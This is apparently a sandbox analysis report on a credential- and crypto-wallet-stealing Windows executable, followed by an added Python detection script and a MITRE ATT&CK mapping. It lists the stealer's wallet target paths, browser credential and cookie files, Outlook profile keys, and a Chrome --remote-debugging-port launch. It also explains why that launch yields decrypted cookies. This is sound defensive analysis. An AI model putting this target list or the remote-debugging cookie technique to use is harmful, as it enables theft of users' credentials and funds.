              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCEB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CCEB66C
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCEB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CCEB1F7
              Source: C:\Users\user\Desktop\test.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR
              Source: test.exe, test.exe, 00000000.00000002.1455992478.0000000000E84000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: z@Program Manager
              Source: test.exe, 00000000.00000002.1455992478.0000000000E84000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: z@Program Managerq
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCEB341 cpuid 0_2_6CCEB341
              Source: C:\Users\user\Desktop\test.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\Desktop\test.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\Desktop\test.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\test.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCB35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,0_2_6CCB35A0

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000000.00000002.1455667853.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1168966295.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR
              Source: Yara match | File source: dump.pcap, type: PCAP
              Source: Yara match | File source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: Jaxx Liberty
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
              Source: test.exe, 00000000.00000002.1455667853.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp, String found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*j
              Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\MultiDoge\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Binance\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
              Source: C:\Users\user\Desktop\test.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
              Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
              Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
              Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
              Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
              Source: Yara match, File source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\test.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match | File source: 00000000.00000002.1455667853.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1168966295.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR
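Detection logic for the two behaviours recorded in the entries above, the wallet-directory and Outlook-profile accesses and Chrome being started by test.exe with --remote-debugging-port=9229, written here as an added example; it is not part of the Joe Sandbox report. A Chromium browser started with a DevTools remote-debugging switch serves cookies and site data to any local client on that port, already decrypted by the browser itself, which is why stealers drive a live browser instead of reading the cookie database on disk once the database is bound to the application. The numbered subkeys under the Outlook MAPI profile hold per-account settings including stored credentials. The record format, the actor attribution, the browser and wallet lists and the "stealer_like" threshold are assumptions made for this example:

```python
"""Triage constructed endpoint telemetry for the stealer behaviours recorded
above: wallet-directory and Outlook-profile access, and a Chromium browser
started with DevTools remote debugging by a non-browser parent.
Record format, field names, thresholds and events are assumptions of this
example, not Joe Sandbox output."""
import ntpath
import re
from collections import defaultdict
from typing import Dict, List, Optional

# %APPDATA% directory names of the wallet applications seen in the report entries
WALLET_DIRS = {"jaxx", "com.liberty.jaxx", "atomic", "atomic_qt", "binance",
               "coinomi", "ledger live", "guarda"}
# Outlook MAPI profile subtree; per-account records are numbered subkeys beneath it
OUTLOOK_PROFILE = "\\windows messaging subsystem\\profiles\\outlook\\"
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
# Switches that expose the DevTools protocol to another local process
DEBUG_SWITCH = re.compile(r"--remote-debugging-(?:port(?:=(\d+))?|pipe)\b", re.I)


def parse(line: str) -> Dict[str, str]:
    """Parse one 'Key=Value|Key=Value' record (constructed format)."""
    rec: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        rec[key.strip()] = value.strip()
    return rec


def wallet_hit(rec: Dict[str, str]) -> Optional[str]:
    """Wallet name when a FileOpen targets a wallet application's data directory."""
    if rec.get("Event") != "FileOpen":
        return None
    m = re.search(r"\\appdata\\roaming\\([^\\]+)", rec["Target"].lower())
    return m.group(1) if m and m.group(1) in WALLET_DIRS else None


def outlook_hit(rec: Dict[str, str]) -> bool:
    """True for RegOpen of a numbered account subkey under the Outlook MAPI profile."""
    if rec.get("Event") != "RegOpen":
        return False
    key = rec["Target"].lower()
    return OUTLOOK_PROFILE in key and re.search(r"\\[0-9a-f]{32}\\\d{8}$", key) is not None


def debug_browser_hit(rec: Dict[str, str]) -> Optional[int]:
    """Debug port (-1 for --remote-debugging-pipe) when a non-browser parent
    launches a browser with a DevTools switch; browser-spawned children
    (renderers, a browser relaunching itself) are ignored."""
    if rec.get("Event") != "ProcessCreate":
        return None
    image = ntpath.basename(rec["Image"]).lower()
    parent = ntpath.basename(rec["ParentImage"]).lower()
    if image not in BROWSERS or parent in BROWSERS:
        return None
    m = DEBUG_SWITCH.search(rec["CommandLine"])
    if m is None:
        return None
    return int(m.group(1)) if m.group(1) else -1


def triage(lines: List[str]) -> Dict[str, dict]:
    """Aggregate hits per acting process (the parent for ProcessCreate, the
    opener for file/registry events). The 'stealer_like' rule, two or more
    wallets plus the mail profile or any DevTools-driven browser, is a
    threshold chosen for this example."""
    acc: Dict[str, dict] = defaultdict(
        lambda: {"wallets": set(), "outlook_profile": False, "debug_port": None})
    for line in lines:
        rec = parse(line)
        actor_path = rec["ParentImage"] if rec.get("Event") == "ProcessCreate" else rec["Image"]
        s = acc[ntpath.basename(actor_path).lower()]
        wallet = wallet_hit(rec)
        if wallet:
            s["wallets"].add(wallet)
        if outlook_hit(rec):
            s["outlook_profile"] = True
        port = debug_browser_hit(rec)
        if port is not None:
            s["debug_port"] = port
    for s in acc.values():
        s["stealer_like"] = (len(s["wallets"]) >= 2 and s["outlook_profile"]) or s["debug_port"] is not None
    return dict(acc)


# Constructed records modelled on the report entries; not real telemetry.
SAMPLE_EVENTS = [
    r"Event=FileOpen|Image=C:\Users\user\Desktop\test.exe|Target=C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets",
    r"Event=FileOpen|Image=C:\Users\user\Desktop\test.exe|Target=C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb",
    r"Event=FileOpen|Image=C:\Users\user\Desktop\test.exe|Target=C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb",
    r"Event=RegOpen|Image=C:\Users\user\Desktop\test.exe|Target=HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001",
    r'Event=ProcessCreate|Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ParentImage=C:\Users\user\Desktop\test.exe|CommandLine="C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""',
    # Benign look-alikes: a wallet reading its own data, a normal browser start,
    # and a browser-spawned child that inherits the switch from its parent.
    r"Event=FileOpen|Image=C:\Users\user\AppData\Local\Programs\atomic\Atomic Wallet.exe|Target=C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb",
    r'Event=ProcessCreate|Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ParentImage=C:\Windows\explorer.exe|CommandLine="C:\Program Files\Google\Chrome\Application\chrome.exe"',
    r'Event=ProcessCreate|Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ParentImage=C:\Program Files\Google\Chrome\Application\chrome.exe|CommandLine="C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9229',
]

if __name__ == "__main__":
    for actor, summary in triage(SAMPLE_EVENTS).items():
        print(actor, summary)
```

Port 9222 is the conventional developer port and 9229 happens to be the Node.js inspector default, so the port number itself is weak evidence; the parent-process check is what separates a stealer from a developer starting a browser from a terminal, and that is where an allowlist belongs when tuning. A wallet application opening its own data directory never trips the rule because the acting process is the wallet, not a third party.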
MITRE ATT&CK Matrix (one line per tactic; techniques the report matched are followed by the badge digits shown in the report in square brackets; the remaining cells are the unmatched matrix template)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API [1]; Command and Scripting Interpreter [2]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading [1]; Extra Window Memory Injection [1]; Process Injection [2]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [12]; DLL Side-Loading [1]; Extra Window Memory Injection [1]; Masquerading [1]; Virtualization/Sandbox Evasion [23]; Process Injection [2]
Credential Access: OS Credential Dumping [2]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1]; File and Directory Discovery [1]; System Information Discovery [235]; Security Software Discovery [641]; Virtualization/Sandbox Evasion [23]; Process Discovery [2]; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Local System [4]; Email Collection [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer [11]; Encrypted Channel [21]; Remote Access Software [1]; Non-Application Layer Protocol [3]; Application Layer Protocol [114]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement